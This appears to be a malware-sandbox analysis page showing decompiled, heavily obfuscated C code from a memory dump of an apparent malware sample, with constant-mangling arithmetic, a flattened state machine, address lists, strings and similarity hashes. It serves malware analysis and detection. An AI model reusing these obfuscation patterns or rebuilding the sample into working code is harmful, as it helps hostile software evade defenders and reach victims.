				_v284 = _v284 | 0xcab8f3ad;
				_v284 = _v284 + 0xffffbf88;
				_v284 = _v284 ^ 0xcaf98724;
				_v288 = 0xe71b41;
				_v288 = _v288 << 0xc;
				_v288 = _v288 + 0x82e4;
				_v288 = _v288 + 0xc607;
				_v288 = _v288 ^ 0x71b4d021;
				_v284 = 0x36f73c;
				_v284 = _v284 | 0xa37e5a12;
				_v284 = _v284 + 0x5303;
				_v284 = _v284 ^ 0xa37c5103;
				_v288 = 0x6e393f;
				_v288 = _v288 + 0x2e80;
				_v288 = _v288 >> 8;
				_v288 = _v288 << 5;
				_v288 = _v288 ^ 0x000da140;
				_v280 = 0x74383f;
				_v280 = _v280 ^ 0x17ac9664;
				_v280 = _v280 ^ 0x17d774c1;
				_v280 = 0x9d0582;
				_v280 = _v280 + 0xffff6485;
				_v280 = _v280 ^ 0x0098d63e;
				_v288 = 0xb24e42;
				_v288 = _v288 * 0x69;
				_v288 = _v288 >> 8;
				_t965 = 5;
				_v288 = _v288 / _t965;
				_v288 = _v288 ^ 0x00012b51;
				_v284 = 0x5ff4be;
				_v284 = _v284 + 0xffff6fc6;
				_v284 = _v284 << 6;
				_v284 = _v284 ^ 0x17d8b779;
				_v284 = 0x27b07f;
				_v284 = _v284 ^ 0x9d15e3bd;
				_t966 = 0x2c;
				_v284 = _v284 * 0x52;
				_v284 = _v284 ^ 0x5a14fdf1;
				_v280 = 0x3fbfe0;
				_v280 = _v280 ^ 0x82657b16;
				_v280 = _v280 ^ 0x82568ec6;
				_v288 = 0xb96e45;
				_v288 = _v288 + 0x5dc;
				_v288 = _v288 | 0x2ab47343;
				_v288 = _v288 * 9;
				_v288 = _v288 ^ 0x80a567c8;
				_v280 = 0xc32966;
				_v280 = _v280 >> 0xf;
				_v280 = _v280 ^ 0x000ea371;
				_v284 = 0x958653;
				_v284 = _v284 + 0x9db8;
				_v284 = _v284 ^ 0x29129d30;
				_v284 = _v284 ^ 0x29822b02;
				_v208 = 0x6754f8;
				_v208 = _v208 + 0xddc2;
				_v208 = _v208 + 0xffff4857;
				_v208 = _v208 ^ 0x9ec4fde9;
				_v208 = _v208 ^ 0x9eae48aa;
				_v264 = 0x8190b;
				_v264 = _v264 + 0xffffb446;
				_v264 = _v264 / _t966;
				_v264 = _v264 ^ 0x665ffc7f;
				_v264 = _v264 ^ 0x66567094;
				_v184 = 0x491843;
				_t967 = 0x14;
				_v184 = _v184 * 0x16;
				_v184 = _v184 * 0x48;
				_v184 = _v184 + 0xffff70fd;
				_v184 = _v184 ^ 0xc44ff284;
				_v156 = 0x502c3b;
				_v156 = _v156 << 0xd;
				_v156 = _v156 / _t967;
				_v156 = _v156 + 0xd1b0;
				_v156 = _v156 ^ 0x004a8940;
				_v168 = 0x325c85;
				_v168 = _v168 ^ 0x3f3352b1;
				_v168 = _v168 >> 7;
				_v168 = _v168 + 0xffba;
				_v168 = _v168 ^ 0x0070a428;
				_v32 = 0xcf0865;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0xf08dd5eb;
				_v256 = 0x7ccea7;
				_v256 = _v256 | 0x7c390d8a;
				_v256 = _v256 + 0x78ba;
				_v256 = _v256 + 0x422;
				_v256 = _v256 ^ 0x7c75038e;
				_v152 = 0x13be48;
				_v152 = _v152 * 0x11;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x53e5cb56;
				_v28 = 0xd8f4ab;
				_t968 = 0x36;
				_v28 = _v28 / _t968;
				_v28 = _v28 ^ 0x000836c4;
				_v80 = 0xd8d14c;
				_v80 = _v80 ^ 0xebcbb317;
				_v80 = _v80 | 0xeddde27e;
				_v80 = _v80 ^ 0xefd5d189;
				_v76 = 0xf70c14;
				_v76 = _v76 | 0x785192b6;
				_v76 = _v76 ^ 0x78fbbede;
				_v172 = 0xe773c3;
				_v172 = _v172 + 0xffff92ac;
				_v172 = _v172 | 0x207e9c8d;
				_v172 = _v172 ^ 0x971b42e7;
				_v172 = _v172 ^ 0xb7e47432;
				_v160 = 0xdce50a;
				_v160 = _v160 >> 6;
				_v160 = _v160 ^ 0xd9394744;
				_v160 = _v160 ^ 0x867cea89;
				_v160 = _v160 ^ 0x5f4b5f15;
				_v164 = 0xb71c52;
				_v164 = _v164 / _t968;
				_v164 = _v164 >> 8;
				_v164 = _v164 + 0xffffa8f2;
				_v164 = _v164 ^ 0xfff251a4;
				_v192 = 0xe1686f;
				_v192 = _v192 ^ 0x32875a36;
				_v192 = _v192 ^ 0xa188b056;
				_t969 = 0x33;
				_v192 = _v192 * 0xf;
				_v192 = _v192 ^ 0xaaf7e9ba;
				_v232 = 0x758485;
				_v232 = _v232 * 0x18;
				_v232 = _v232 << 0xb;
				_v232 = _v232 + 0x1189;
				_v232 = _v232 ^ 0x2361087e;
				_v100 = 0xb96d51;
				_v100 = _v100 * 0x5f;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x00071793;
				_v56 = 0xd53a71;
				_v56 = _v56 ^ 0x6ecda4c0;
				_v56 = _v56 ^ 0x6e1c1666;
				_v244 = 0xd59ca;
				_v244 = _v244 + 0xffffcd37;
				_v244 = _v244 / _t969;
				_v244 = _v244 * 0x36;
				_v244 = _v244 ^ 0x000bcb21;
				_v252 = 0xb0c8ac;
				_v252 = _v252 + 0xffff8826;
				_v252 = _v252 ^ 0xb2503642;
				_v252 = _v252 ^ 0x3e7bb21f;
				_v252 = _v252 ^ 0x8c959651;
				_v120 = 0x699df5;
				_v120 = _v120 >> 4;
				_v120 = _v120 | 0x9f4c827b;
				_v120 = _v120 ^ 0x9f455b54;
				_v128 = 0x4248b3;
				_v128 = _v128 ^ 0x5987d037;
				_v128 = _v128 | 0x92b42dbc;
				_v128 = _v128 ^ 0xdbfd1258;
				_v260 = 0xaf47a4;
				_v260 = _v260 >> 0xd;
				_v260 = _v260 >> 7;
				_v260 = _v260 >> 0xf;
				_v260 = _v260 ^ 0x00040c52;
				_v136 = 0x21b5d2;
				_v136 = _v136 << 7;
				_t970 = 0x2f;
				_v136 = _v136 / _t970;
				_v136 = _v136 ^ 0x0050bda8;
				_v144 = 0xd9772;
				_v144 = _v144 | 0x2650e074;
				_t971 = 0x54;
				_v144 = _v144 * 0x29;
				_v144 = _v144 ^ 0x250b1143;
				_v40 = 0x6e957c;
				_v40 = _v40 ^ 0xe1bc248f;
				_v40 = _v40 ^ 0xe1d22c19;
				_v236 = 0x62222b;
				_t498 =  &_v236; // 0x62222b
				_v236 =  *_t498 / _t971;
				_v236 = _v236 | 0xfdffecc6;
				_v236 = _v236 ^ 0xfdf693dd;
				_v24 = 0x18c4;
				_v24 = _v24 + 0xce74;
				_v24 = _v24 ^ 0x00097b98;
				_v68 = 0xcb7c13;
				_v68 = _v68 ^ 0xfc67023d;
				_v68 = _v68 ^ 0xfca7029b;
				_v220 = 0x5b96c6;
				_v220 = _v220 + 0x38f6;
				_t972 = 0x60;
				_v220 = _v220 * 0x6c;
				_v220 = _v220 >> 1;
				_v220 = _v220 ^ 0x135f8bf0;
				_v228 = 0xc27139;
				_v228 = _v228 + 0xfffff0fa;
				_v228 = _v228 + 0xc927;
				_v228 = _v228 << 2;
				_v228 = _v228 ^ 0x03094a64;
				_v72 = 0xd92013;
				_v72 = _v72 ^ 0x99c11be2;
				_v72 = _v72 ^ 0x9911b9cd;
				_v60 = 0xd394c2;
				_v60 = _v60 + 0xffff8edd;
				_v60 = _v60 ^ 0x00dabefb;
				_v196 = 0x13820b;
				_v196 = _v196 + 0x4754;
				_v196 = _v196 ^ 0xeab6a8c6;
				_v196 = _v196 + 0xdc4d;
				_v196 = _v196 ^ 0xeaaabeae;
				_v212 = 0x4c2d81;
				_v212 = _v212 / _t972;
				_v212 = _v212 | 0x16d717b9;
				_v212 = _v212 << 1;
				_v212 = _v212 ^ 0x2da8f6a4;
				_v180 = 0xf19643;
				_v180 = _v180 + 0xffff456e;
				_v180 = _v180 ^ 0x6947890b;
				_v180 = _v180 << 0xd;
				_v180 = _v180 ^ 0xea504a89;
				_v280 = 0x7fcbc8;
				_t973 = 0x4f;
				_v280 = _v280 / _t973;
				_v280 = _v280 ^ 0x0006b642;
				_v96 = 0xd7bdf1;
				_v96 = _v96 >> 0xd;
				_v96 = _v96 | 0xeca5ef9b;
				_v96 = _v96 ^ 0xeca198ca;
				_v104 = 0xfb44e2;
				_t974 = 0x31;
				_v104 = _v104 / _t974;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x029b088c;
				_v124 = 0x88fb4d;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 | 0x2e56e634;
				_v124 = _v124 ^ 0x2e5ba5f8;
				_v92 = 0x3b093;
				_v92 = _v92 + 0xffff703a;
				_v92 = _v92 | 0x96b4007f;
				_v92 = _v92 ^ 0x96b77fac;
				_v132 = 0xdd4683;
				_v132 = _v132 << 0xd;
				_t975 = 0x7c;
				_v132 = _v132 / _t975;
				_v132 = _v132 ^ 0x0154b018;
				_v108 = 0xbeff3d;
				_v108 = _v108 << 7;
				_v108 = _v108 << 4;
				_v108 = _v108 ^ 0xf7fd5421;
				_v140 = 0x48d90b;
				_v140 = _v140 >> 5;
				_v140 = _v140 + 0xb5c1;
				_v140 = _v140 ^ 0x000d626c;
				_v88 = 0xc12ccf;
				_t976 = 0x2e;
				_v88 = _v88 * 0x64;
				_v88 = _v88 ^ 0x08e6f18a;
				_v88 = _v88 ^ 0x4390cfd1;
				_v64 = 0x72d71d;
				_v64 = _v64 | 0xa2a1a46d;
				_v64 = _v64 ^ 0xa2f81805;
				_v200 = 0xf03809;
				_v200 = _v200 | 0x4f211482;
				_v200 = _v200 << 0xe;
				_v200 = _v200 + 0xffff694c;
				_v200 = _v200 ^ 0x4f28fcc6;
				_v248 = 0x3a64e3;
				_v248 = _v248 | 0xc30208b3;
				_v248 = _v248 >> 1;
				_v248 = _v248 >> 3;
				_v248 = _v248 ^ 0x0c352193;
				_v288 = 0xa9e603;
				_v288 = _v288 / _t976;
				_v288 = _v288 + 0x3317;
				_v288 = _v288 + 0x918f;
				_v288 = _v288 ^ 0x00093eae;
				_v284 = 0xfa6ee4;
				_v284 = _v284 * 0x5e;
				_v284 = _v284 + 0xffffc825;
				_v284 = _v284 ^ 0x5bf6e4df;
				_t977 = _v12;
				_t985 = _v12;
				while(1) {
					L1:
					_t943 = 0xa107c13;
					while(1) {
						_t844 = 0x980caeb;
						do {
							while(1) {
								L3:
								_t989 = _t978 - 0x451d82b;
								if(_t989 <= 0) {
									break;
								}
								if(_t978 == 0x8ff030f) {
									E1001CDD8(_v8, _v288, _v284);
									_t978 = 0x2a85474;
									L39:
									_t879 = _a4;
									_t943 = 0xa107c13;
									L40:
									_t844 = 0x980caeb;
								} else {
									if(_t978 == _t844) {
										E10020701(_t977, _a8);
										_t978 = 0x315c9b9;
										_t847 = 1;
										_t874 =  !=  ? _t847 : _t874;
										goto L13;
									} else {
										if(_t978 == _t943) {
											if( *_t879 == 0) {
												_t848 = _v16;
											} else {
												_push(_v56);
												_push(_v100);
												_push(_v232);
												_t848 = E1000416C(_v192, 0x10001504);
												_t987 =  &(_t987[3]);
												_v16 = _t848;
											}
											_t889 = _v20 | _v224 | _v276 | _v216 | _v272 | _v48 | _v116 | _v148 | _v268;
											_t980 = _v4 & 1;
											if(_t980 != 0) {
												_t889 = _t889 | 0x00803000;
											}
											_push(_t889);
											_t977 = E10017071(_t848, _v244, _t889, _t889, _v252, _t889, _v120, _t889, _v128, _v260, _a28, _v136, _v144, _t985);
											E1000B952(_v40, _v16, _v236, _v24);
											_t987 =  &(_t987[0xf]);
											if(_t977 == 0) {
												L12:
												_t978 = 0x451d82b;
											} else {
												_push(_v72);
												_push(_v228);
												_push(_v112);
												_v44 = 1;
												_push( &_v44);
												_push(_t977);
												_push(_v220);
												_t892 = 4;
												E1000884A(_t892, _v68);
												_t987 =  &(_t987[6]);
												if(_t980 != 0) {
													E100163FD(_v60,  &_v44,  &_v12, _v196, _t977, _v204, _v212);
													_v44 = _v44 | _v52;
													E1000884A(_v12, _v180, _v280, _t977,  &_v44, _v188, _v96, _v104);
													_t987 =  &(_t987[0xb]);
												}
												_t978 = 0xdff0233;
											}
											goto L13;
											L43:
										} else {
											if(_t978 == 0xd9b7a81) {
												E10007D86(_t977, _v240);
												_t943 = 0xa107c13;
												_t879 = _a4;
												_t844 = 0x980caeb;
												_t978 =  ==  ? 0x980caeb : 0x315c9b9;
												continue;
											} else {
												if(_t978 == 0xdff0233) {
													_t904 =  *_t879;
													if( *_t879 == 0) {
														_t869 = 0;
													} else {
														_t869 =  *((intOrPtr*)(_a4 + 4));
													}
													E1001AFA4(_a40, _v124, _t904, _t869, _t977, _t904, _v92, _v132, _v108, _v140);
													_t987 =  &(_t987[8]);
													asm("sbb esi, esi");
													_t978 = (_t978 & 0x0a85b0c8) + 0x315c9b9;
													L13:
													_t879 = _a4;
													goto L1;
												}
											}
										}
									}
								}
								goto L41;
							}
							if(_t989 == 0) {
								E1001CDD8(_t985, _v200, _v248);
								_t978 = 0x8ff030f;
								goto L13;
							} else {
								if(_t978 == 0x1eb2e8f) {
									_t978 = 0x2c94fd4;
									goto L3;
								} else {
									if(_t978 == 0x20a3cfe) {
										_t978 = 0x1eb2e8f;
										goto L3;
									} else {
										if(_t978 == 0x2c94fd4) {
											_push(_t879);
											_v8 = E1000FB6B(_v84, _v208, _v264, _v184, _t879, _t879, _v156);
											_t978 =  !=  ? 0x429a6f4 : 0x2a85474;
											E100088FC(_v168, _v32, _v256, _v152, 0);
											_t987 =  &(_t987[0xa]);
											goto L39;
										} else {
											if(_t978 == 0x315c9b9) {
												E1001CDD8(_t977, _v88, _v64);
												goto L12;
											} else {
												if(_t978 != 0x429a6f4) {
													goto L40;
												} else {
													_t867 = E100119D6(_v28, _t879, _v80, _t879, _v76, _a36, _a20, _v172, _v8, _v160, _t879, _v36, _v164);
													_t879 = _a4;
													_t985 = _t867;
													_t987 =  &(_t987[0xc]);
													_t943 = 0xa107c13;
													_t978 =  !=  ? 0xa107c13 : 0x8ff030f;
													_t844 = 0x980caeb;
													goto L3;
												}
											}
										}
									}
								}
							}
							L41:
						} while (_t978 != 0x2a85474);
						return _t874;
						goto L43;
					}
				}
			}

0x10012389
0x1001239c
0x1001239d
0x100123a4
0x100123ab
0x100123b2
0x100123b9
0x100123c0
0x100123c7
0x100123ce
0x100123d5
0x100123d6
0x100123d7
0x100123d8
0x100123dd
0x100123e5
0x100123e8
0x100123ef
0x100123f7
0x100123f9
0x100123fd
0x10012402
0x1001240a
0x10012412
0x1001241a
0x10012422
0x10012427
0x1001242f
0x1001243a
0x1001244b
0x1001244c
0x10012457
0x10012460
0x1001246b
0x10012476
0x1001247e
0x10012486
0x1001248b
0x10012493
0x1001249b
0x100124a6
0x100124b1
0x100124bc
0x100124c7
0x100124d2
0x100124da
0x100124e5
0x100124f0
0x100124fb
0x10012503
0x1001250e
0x10012516
0x1001251e
0x10012526
0x1001252b
0x10012533
0x1001253b
0x10012540
0x10012548
0x10012550
0x10012558
0x10012564
0x10012567
0x1001256b
0x10012573
0x1001257b
0x10012585
0x1001258d
0x10012599
0x1001259c
0x100125a0
0x100125a5
0x100125ad
0x100125c3
0x100125ca
0x100125d5
0x100125e0
0x100125eb
0x100125f6
0x10012601
0x10012613
0x10012618
0x10012621
0x10012628
0x10012633
0x1001263b
0x10012644
0x10012647
0x1001264b
0x10012653
0x1001265b
0x10012668
0x1001266c
0x10012671
0x10012679
0x10012681
0x1001268c
0x10012694
0x1001269f
0x100126b2
0x100126b9
0x100126c4
0x100126cc
0x100126d1
0x100126d9
0x100126e1
0x100126e9
0x100126f1
0x100126f9
0x10012701
0x10012709
0x1001270e
0x10012716
0x1001271e
0x10012726
0x1001272e
0x10012736
0x1001273e
0x10012746
0x1001274e
0x10012756
0x1001275b
0x10012760
0x10012768
0x10012770
0x10012778
0x10012780
0x10012788
0x10012790
0x10012798
0x100127a5
0x100127ab
0x100127b6
0x100127bb
0x100127c1
0x100127c9
0x100127d1
0x100127d9
0x100127de
0x100127e6
0x100127ee
0x100127fb
0x100127fe
0x10012802
0x1001280a
0x10012812
0x1001281a
0x10012822
0x1001282a
0x10012832
0x1001283f
0x10012843
0x1001284b
0x10012853
0x10012858
0x10012860
0x10012868
0x10012870
0x10012878
0x10012880
0x10012888
0x10012890
0x10012898
0x100128a0
0x100128a8
0x100128b0
0x100128c0
0x100128c4
0x100128cc
0x100128d4
0x100128e1
0x100128e2
0x100128eb
0x100128ef
0x100128f7
0x100128ff
0x1001290a
0x1001291b
0x10012922
0x1001292d
0x10012938
0x10012943
0x1001294e
0x10012956
0x10012961
0x1001296c
0x10012977
0x1001297f
0x1001298a
0x10012992
0x1001299a
0x100129a2
0x100129aa
0x100129b2
0x100129c5
0x100129ce
0x100129d6
0x100129e1
0x100129f5
0x100129fa
0x10012a01
0x10012a0c
0x10012a17
0x10012a22
0x10012a2d
0x10012a38
0x10012a43
0x10012a4e
0x10012a59
0x10012a64
0x10012a6f
0x10012a7a
0x10012a85
0x10012a90
0x10012a9b
0x10012aa3
0x10012aae
0x10012ab9
0x10012ac4
0x10012ada
0x10012ae3
0x10012aeb
0x10012af6
0x10012b01
0x10012b09
0x10012b11
0x10012b1e
0x10012b1f
0x10012b23
0x10012b2b
0x10012b38
0x10012b3c
0x10012b41
0x10012b49
0x10012b51
0x10012b64
0x10012b6b
0x10012b73
0x10012b7e
0x10012b89
0x10012b94
0x10012b9f
0x10012ba7
0x10012bb5
0x10012bbe
0x10012bc2
0x10012bca
0x10012bd2
0x10012bda
0x10012be2
0x10012bea
0x10012bf2
0x10012bfd
0x10012c05
0x10012c10
0x10012c1b
0x10012c26
0x10012c31
0x10012c3c
0x10012c47
0x10012c4f
0x10012c56
0x10012c5b
0x10012c60
0x10012c68
0x10012c73
0x10012c84
0x10012c89
0x10012c92
0x10012c9d
0x10012ca8
0x10012cbb
0x10012cbe
0x10012cc5
0x10012cd0
0x10012cdb
0x10012ce6
0x10012cf1
0x10012cf9
0x10012d01
0x10012d05
0x10012d0d
0x10012d15
0x10012d20
0x10012d2b
0x10012d36
0x10012d41
0x10012d4c
0x10012d57
0x10012d5f
0x10012d6c
0x10012d6f
0x10012d73
0x10012d77
0x10012d7f
0x10012d87
0x10012d8f
0x10012d97
0x10012d9c
0x10012da4
0x10012daf
0x10012dba
0x10012dc5
0x10012dd0
0x10012ddb
0x10012de6
0x10012dee
0x10012df6
0x10012dfe
0x10012e06
0x10012e0e
0x10012e1e
0x10012e22
0x10012e2a
0x10012e2e
0x10012e36
0x10012e41
0x10012e4c
0x10012e57
0x10012e5f
0x10012e6a
0x10012e76
0x10012e79
0x10012e7d
0x10012e85
0x10012e92
0x10012e9a
0x10012ea5
0x10012eb0
0x10012ec4
0x10012ec9
0x10012ed2
0x10012eda
0x10012ee5
0x10012ef0
0x10012ef8
0x10012f03
0x10012f0e
0x10012f19
0x10012f24
0x10012f2f
0x10012f3a
0x10012f45
0x10012f54
0x10012f59
0x10012f62
0x10012f6d
0x10012f78
0x10012f80
0x10012f88
0x10012f93
0x10012f9e
0x10012fa6
0x10012fb1
0x10012fbc
0x10012fcf
0x10012fd0
0x10012fd7
0x10012fe2
0x10012fed
0x10012ff8
0x10013003
0x1001300e
0x10013016
0x1001301e
0x10013023
0x1001302b
0x10013033
0x1001303b
0x10013043
0x10013047
0x1001304c
0x10013054
0x10013062
0x10013066
0x1001306e
0x10013076
0x1001307e
0x1001308b
0x1001308f
0x10013097
0x1001309f
0x100130a6
0x100130ad
0x100130ad
0x100130ad
0x100130b2
0x100130b2
0x100130b7
0x100130b7
0x100130b7
0x100130b7
0x100130bd
0x00000000
0x00000000
0x1001322e
0x100134b2
0x100134b8
0x100134bd
0x100134bd
0x100134c4
0x100134c9
0x100134c9
0x10013234
0x10013236
0x1001348c
0x10013493
0x1001349a
0x1001349b
0x00000000
0x1001323c
0x1001323e
0x100132ec
0x1001331a
0x100132ee
0x100132ee
0x100132fa
0x10013301
0x10013309
0x1001330e
0x10013311
0x10013311
0x10013357
0x1001335b
0x1001335d
0x1001335f
0x1001335f
0x10013365
0x100133af
0x100133bc
0x100133c1
0x100133c6
0x10013186
0x10013186
0x100133cc
0x100133cc
0x100133d5
0x100133da
0x100133e1
0x100133ef
0x100133f0
0x100133f1
0x100133fe
0x100133ff
0x10013404
0x10013409
0x1001342e
0x10013441
0x10013471
0x10013476
0x10013476
0x10013479
0x10013479
0x00000000
0x00000000
0x10013244
0x1001324a
0x100132bd
0x100132d0
0x100132d5
0x100132dc
0x100132e1
0x00000000
0x1001324c
0x10013252
0x10013258
0x1001325c
0x1001326a
0x1001325e
0x10013265
0x10013265
0x1001329a
0x1001329f
0x100132a4
0x100132ac
0x1001318b
0x1001318b
0x00000000
0x1001318b
0x10013252
0x1001324a
0x1001323e
0x10013236
0x00000000
0x1001322e
0x100130c3
0x10013218
0x1001321e
0x00000000
0x100130c9
0x100130cf
0x10013204
0x00000000
0x100130d5
0x100130db
0x100131fa
0x00000000
0x100130e1
0x100130e7
0x10013197
0x100131c7
0x100131ea
0x100131ed
0x100131f2
0x00000000
0x100130ed
0x100130f3
0x10013180
0x00000000
0x100130f5
0x100130fc
0x00000000
0x10013102
0x1001314b
0x10013150
0x10013157
0x10013159
0x10013163
0x10013168
0x100130b2
0x00000000
0x100130b2
0x100130fc
0x100130f3
0x100130e7
0x100130db
0x100130cf
0x100134ce
0x100134ce
0x100134e6
0x00000000
0x100134e6
0x100130b2

Strings

TG, xrefs: 10012DEE
d:, xrefs: 10013033
;,P, xrefs: 100128FF
::S, xrefs: 10012412
?8t, xrefs: 10012768
+"b, xrefs: 10012CF9
aC, xrefs: 100126E1
lb, xrefs: 10012FB1
0=, xrefs: 100124A6
C6NG, xrefs: 1001248B
/Ch%, xrefs: 10012550
tP&, xrefs: 10012CA8
oh, xrefs: 10012B01
4V., xrefs: 10012EF8
?9n, xrefs: 10012746

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: +"b$/Ch%$0=$4V.$::S$;,P$?8t$?9n$C6NG$TG$aC$lb$oh$tP&$d:
API String ID: 0-276614295
Opcode ID: 947caf241533e14512bfc38b7f66a129ed851c18ebb92c8db2b3c7510d87b434
Instruction ID: d048e142e80ea67b4fe46ee72f540d3226a686bf843d38847b979f81d984cb94
Opcode Fuzzy Hash: 947caf241533e14512bfc38b7f66a129ed851c18ebb92c8db2b3c7510d87b434
Instruction Fuzzy Hash: 988213715093819FD3B8CF25C58AA8BBBE1FBC4744F108A1DE5DA96260D7B48949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 1001A712, Relevance: 17.9, Strings: 14, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001A712(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				char _t381;
				intOrPtr _t393;
				void* _t398;
				signed int _t400;
				intOrPtr _t405;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				void* _t413;
				void* _t435;
				intOrPtr* _t442;
				signed int _t445;
				intOrPtr _t450;
				signed int* _t452;
				void* _t455;

				_push(_a12);
				_push(_a8);
				_v16 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(__edx);
				_v92 = 0xc65b17;
				_t452 =  &(( &_v188)[5]);
				_v92 = _v92 + 0xe32f;
				_v92 = _v92 | 0xecd4c5dd;
				_t405 = 0;
				_v92 = _v92 ^ 0xecd7ffde;
				_t445 = 0xa5fe53e;
				_v112 = 0x9df23f;
				_t450 = 0;
				_v112 = _v112 | 0xc83402e1;
				_v112 = _v112 + 0xcb43;
				_v112 = _v112 ^ 0xc8bebe43;
				_v168 = 0x9a66e;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 >> 0xe;
				_v168 = _v168 << 0x10;
				_v168 = _v168 ^ 0x00000001;
				_v148 = 0xb2321e;
				_v148 = _v148 << 5;
				_v148 = _v148 | 0xd65bddb3;
				_v148 = _v148 ^ 0xd65724e8;
				_v156 = 0xaa2005;
				_t407 = 0x44;
				_v156 = _v156 / _t407;
				_v156 = _v156 | 0x4555bfe9;
				_v156 = _v156 ^ 0x0e625154;
				_v156 = _v156 ^ 0x4b3c4ed8;
				_v164 = 0xe29caa;
				_v164 = _v164 | 0xce111e12;
				_v164 = _v164 << 0xb;
				_v164 = _v164 ^ 0x00fa9558;
				_v164 = _v164 ^ 0x9c01f873;
				_v172 = 0x42d388;
				_v172 = _v172 ^ 0xfc03c626;
				_v172 = _v172 >> 2;
				_v172 = _v172 >> 3;
				_v172 = _v172 ^ 0x07e7dbac;
				_v80 = 0xa5daec;
				_v80 = _v80 + 0xffffbe13;
				_v80 = _v80 ^ 0x00abf89c;
				_v32 = 0xb7c200;
				_v32 = _v32 >> 9;
				_v32 = _v32 ^ 0x000423ba;
				_v180 = 0xf7be9a;
				_v180 = _v180 | 0x5eafa1d9;
				_v180 = _v180 + 0xffff5f28;
				_v180 = _v180 + 0xffffe826;
				_v180 = _v180 ^ 0x5ef5c70f;
				_v188 = 0xf11d14;
				_v188 = _v188 + 0xffff65a6;
				_v188 = _v188 >> 0xe;
				_v188 = _v188 + 0x626b;
				_v188 = _v188 ^ 0x000c077d;
				_v176 = 0x256fe2;
				_t408 = 0x66;
				_v176 = _v176 * 0x41;
				_v176 = _v176 + 0xffffb7ef;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x30234caa;
				_v28 = 0x3f7665;
				_v28 = _v28 / _t408;
				_v28 = _v28 ^ 0x00078c33;
				_v128 = 0x60bb91;
				_v128 = _v128 ^ 0x16557914;
				_v128 = _v128 + 0xffff5d33;
				_v128 = _v128 ^ 0x163cfff8;
				_v132 = 0x297722;
				_t120 =  &_v132; // 0x297722
				_t409 = 0x22;
				_v132 =  *_t120 / _t409;
				_v132 = _v132 << 4;
				_v132 = _v132 ^ 0x001ba0bb;
				_v84 = 0xbeffdf;
				_v84 = _v84 + 0xffff59ae;
				_v84 = _v84 ^ 0x00b586b6;
				_v24 = 0xdfb474;
				_v24 = _v24 + 0x1b25;
				_v24 = _v24 ^ 0x00d7dfa1;
				_v100 = 0xea7791;
				_v100 = _v100 + 0xffff370d;
				_v100 = _v100 >> 3;
				_v100 = _v100 ^ 0x0016a3ca;
				_v72 = 0x7fad23;
				_v72 = _v72 | 0xf48edc3e;
				_v72 = _v72 ^ 0xf4fa936e;
				_v40 = 0x1ef2bb;
				_v40 = _v40 ^ 0xad0b4017;
				_v40 = _v40 ^ 0xad175394;
				_v56 = 0x7d0ff8;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x0014a2cc;
				_v152 = 0x99a012;
				_t410 = 0x19;
				_v152 = _v152 * 0x4b;
				_v152 = _v152 ^ 0xf6f66843;
				_v152 = _v152 ^ 0x9bd25aee;
				_v152 = _v152 ^ 0x4027bece;
				_v48 = 0xda1ee4;
				_v48 = _v48 * 0x37;
				_v48 = _v48 ^ 0x2ed5a4cf;
				_v124 = 0x7818e9;
				_v124 = _v124 + 0xbfad;
				_v124 = _v124 << 0xb;
				_v124 = _v124 ^ 0xc6c94aec;
				_v184 = 0x806482;
				_v184 = _v184 << 0xe;
				_v184 = _v184 | 0xf86eaee1;
				_v184 = _v184 >> 1;
				_v184 = _v184 ^ 0x7cb980b7;
				_v108 = 0xb50ddd;
				_v108 = _v108 ^ 0x7f3bdcd4;
				_v108 = _v108 << 4;
				_v108 = _v108 ^ 0xf8ebb274;
				_v104 = 0x1bdfcc;
				_v104 = _v104 | 0xc7fbddff;
				_v104 = _v104 ^ 0xc7fec9e7;
				_v64 = 0xed254d;
				_v64 = _v64 ^ 0x13375f6c;
				_v64 = _v64 ^ 0x13da4126;
				_v160 = 0xccbb20;
				_v160 = _v160 ^ 0x1668d287;
				_v160 = _v160 + 0x6be7;
				_v160 = _v160 * 0x44;
				_v160 = _v160 ^ 0x03ce70f4;
				_v116 = 0x15ab36;
				_v116 = _v116 / _t410;
				_v116 = _v116 * 0x44;
				_v116 = _v116 ^ 0x00376bef;
				_v36 = 0x156cb2;
				_v36 = _v36 ^ 0x3ddf5a97;
				_v36 = _v36 ^ 0x3dcf5038;
				_v120 = 0xe67534;
				_v120 = _v120 | 0x53c205e4;
				_t411 = 0x74;
				_t442 = _v16;
				_v120 = _v120 * 0x45;
				_v120 = _v120 ^ 0x9d12d93f;
				_v144 = 0x4881bd;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 | 0x98da132c;
				_v144 = _v144 >> 1;
				_v144 = _v144 ^ 0x4c6d225e;
				_v52 = 0xd9a910;
				_v52 = _v52 + 0xffffcb23;
				_v52 = _v52 ^ 0x00d86713;
				_v60 = 0xfd15e;
				_v60 = _v60 / _t411;
